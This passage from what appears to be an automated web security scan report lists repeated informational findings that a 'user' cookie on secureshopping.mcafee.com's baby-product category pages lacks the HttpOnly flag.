user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.16. http://secureshopping.mcafee.com/browse/baby/apparel/pajamas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/pajamas/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.17. http://secureshopping.mcafee.com/browse/baby/apparel/pants/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/pants/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.18. http://secureshopping.mcafee.com/browse/baby/apparel/shirts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.19. http://secureshopping.mcafee.com/browse/baby/apparel/sweaters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/sweaters/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.20. http://secureshopping.mcafee.com/browse/baby/apparel/swimwear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/swimwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.21. http://secureshopping.mcafee.com/browse/baby/bathing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.22. http://secureshopping.mcafee.com/browse/baby/bathing/bath-tubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/bath-tubs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:59 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.23. http://secureshopping.mcafee.com/browse/baby/bathing/hooded-towels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/hooded-towels/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:59 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.24. http://secureshopping.mcafee.com/browse/baby/bathing/lotion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/lotion/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:01 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.25. http://secureshopping.mcafee.com/browse/baby/bathing/potty-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/potty-training/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.26. http://secureshopping.mcafee.com/browse/baby/bathing/powder/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/powder/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.27. http://secureshopping.mcafee.com/browse/baby/bathing/shampoo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/shampoo/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.28. http://secureshopping.mcafee.com/browse/baby/bathing/soap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/soap/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:06 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.29. http://secureshopping.mcafee.com/browse/baby/bathing/washcloths/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/washcloths/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.30. http://secureshopping.mcafee.com/browse/baby/bedding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.31. http://secureshopping.mcafee.com/browse/baby/bedding/bedskirts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bedskirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:01 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.32. http://secureshopping.mcafee.com/browse/baby/bedding/blankets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/blankets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:01 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.33. http://secureshopping.mcafee.com/browse/baby/bedding/bumper-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bumper-pads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.34. http://secureshopping.mcafee.com/browse/baby/bedding/comforters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/comforters/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.35. http://secureshopping.mcafee.com/browse/baby/bedding/crib-sets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/crib-sets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.36. http://secureshopping.mcafee.com/browse/baby/bedding/hooded-towels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/hooded-towels/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.37. http://secureshopping.mcafee.com/browse/baby/bedding/mattress-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/mattress-pads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:11 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.38. http://secureshopping.mcafee.com/browse/baby/bedding/sheets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/sheets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.39. http://secureshopping.mcafee.com/browse/baby/bedding/washcloths/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/washcloths/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.40. http://secureshopping.mcafee.com/browse/baby/diapering/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.41. http://secureshopping.mcafee.com/browse/baby/diapering/baby-wipes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/baby-wipes/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.42. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-bags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-bags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.43. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-covers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.44. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-storage-disposal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-storage-disposal/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.45. http://secureshopping.mcafee.com/browse/baby/diapering/diapers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diapers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.46. http://secureshopping.mcafee.com/browse/baby/diapering/skin-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/skin-care/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.47. http://secureshopping.mcafee.com/browse/baby/feeding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.48. http://secureshopping.mcafee.com/browse/baby/feeding/baby-food-grinders/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/baby-food-grinders/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.49. http://secureshopping.mcafee.com/browse/baby/feeding/baby-food/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/baby-food/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.50. http://secureshopping.mcafee.com/browse/baby/feeding/bibs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/bibs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.51. http://secureshopping.mcafee.com/browse/baby/feeding/bottles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/bottles/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.52. http://secureshopping.mcafee.com/browse/baby/feeding/breast-pumps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/breast-pumps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.53. http://secureshopping.mcafee.com/browse/baby/feeding/formula/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/formula/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.54. http://secureshopping.mcafee.com/browse/baby/feeding/milk-storage-bags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/milk-storage-bags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.55. http://secureshopping.mcafee.com/browse/baby/feeding/nipples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nipples/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.56. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-apparel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-apparel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.57. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-bras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-bras/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.58. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-pads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.59. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-pillows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-pillows/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.60. http://secureshopping.mcafee.com/browse/baby/feeding/spoons-forks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/spoons-forks/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.61. http://secureshopping.mcafee.com/browse/baby/furniture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.62. http://secureshopping.mcafee.com/browse/baby/furniture/bassinets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/bassinets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:22 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.63. http://secureshopping.mcafee.com/browse/baby/furniture/changing-tables/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/changing-tables/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:24 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.64. http://secureshopping.mcafee.com/browse/baby/furniture/cribs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/cribs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.65. http://secureshopping.mcafee.com/browse/baby/furniture/dressers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/dressers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.66. http://secureshopping.mcafee.com/browse/baby/furniture/gliders-walkers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/gliders-walkers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.67. http://secureshopping.mcafee.com/browse/baby/furniture/high-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/high-chairs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.68. http://secureshopping.mcafee.com/browse/baby/furniture/lamps-shades/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/lamps-shades/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.69. http://secureshopping.mcafee.com/browse/baby/furniture/mobiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/mobiles/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.70. http://secureshopping.mcafee.com/browse/baby/furniture/moses-baskets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/moses-baskets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.71. http://secureshopping.mcafee.com/browse/baby/furniture/night-lights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/night-lights/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.72. http://secureshopping.mcafee.com/browse/baby/furniture/play-pens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/play-pens/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.73. http://secureshopping.mcafee.com/browse/baby/furniture/rocking-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/rocking-chairs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.74. http://secureshopping.mcafee.com/browse/baby/furniture/swings-bouncers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/swings-bouncers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.75. http://secureshopping.mcafee.com/browse/baby/furniture/toddler-bed/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/toddler-bed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.76. http://secureshopping.mcafee.com/browse/baby/furniture/toy-chests/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/toy-chests/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:41 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.77. http://secureshopping.mcafee.com/browse/baby/health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.78. http://secureshopping.mcafee.com/browse/baby/health/brushes-combs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/brushes-combs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

